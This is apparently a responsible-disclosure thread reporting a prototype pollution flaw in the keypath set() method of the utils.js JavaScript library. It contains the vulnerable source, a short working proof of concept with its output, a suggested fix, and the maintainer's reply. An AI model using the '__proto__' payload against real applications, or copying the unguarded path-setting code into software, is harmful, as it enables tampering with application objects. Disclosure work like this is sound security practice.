Prototype Pollution

[P0cas]

Summary

Hello @fabiocaccamo and @snyk.

This time I really found Prototype Pollution! lol.

I discovered a prototype pollution vulnerability via utils.js method analysis.

set: function(obj, path, value)
        {
            var keys = path.split('.');
            var key;
            var cursor = obj;
            for (var i = 0, j = keys.length; i < j; i++) {
                key = keys[i];
                if (!TypeUtil.isObject(cursor[key])) {
                    cursor[key] = {};
                }
                if (i < (j - 1)) {
                    cursor = cursor[key];
                } else {
                    cursor[key] = value;
                }
            }
        }
// https://github.com/fabiocaccamo/utils.js/blob/master/dist/utils.js#L2360

If you check the set() method of utils.object.keypath, you can see that the value of the path parameter is split with dots, and then merged with the value of the value parameter based on the key value. this means that it can be exploited as a prototype pollution.

const utils = require("@fabiocaccamo/utils.js");
const obj = {};
const fake_obj = {};

console.log(`[+] Before prototype pollution : ${obj.polluted}`);
utils.object.keypath.set(fake_obj, '__proto__.polluted', true);
console.log(`[+] After prototype pollution : ${obj.polluted}`);

/* 
[+] Before prototype pollution : undefined
[+] After prototype pollution : true
*/

I wrote PoC as above!

A prototype pollution vulnerability has occurred and you can see the object being polluted. To patch this vulnerability, use the Object.freeze() method or the key value must be verified. (e.g __proto__)

[fabiocaccamo]

@wjddnjs33 thank you for reporting this, feel free to submit a PR with the relative test.

[P0cas]

yeah i just created a pull request

[fabiocaccamo]

@wjddnjs33 just FYI, this is what I was asking for:
102efaf

[P0cas]

thank you! Next time, I will give you a PR as above.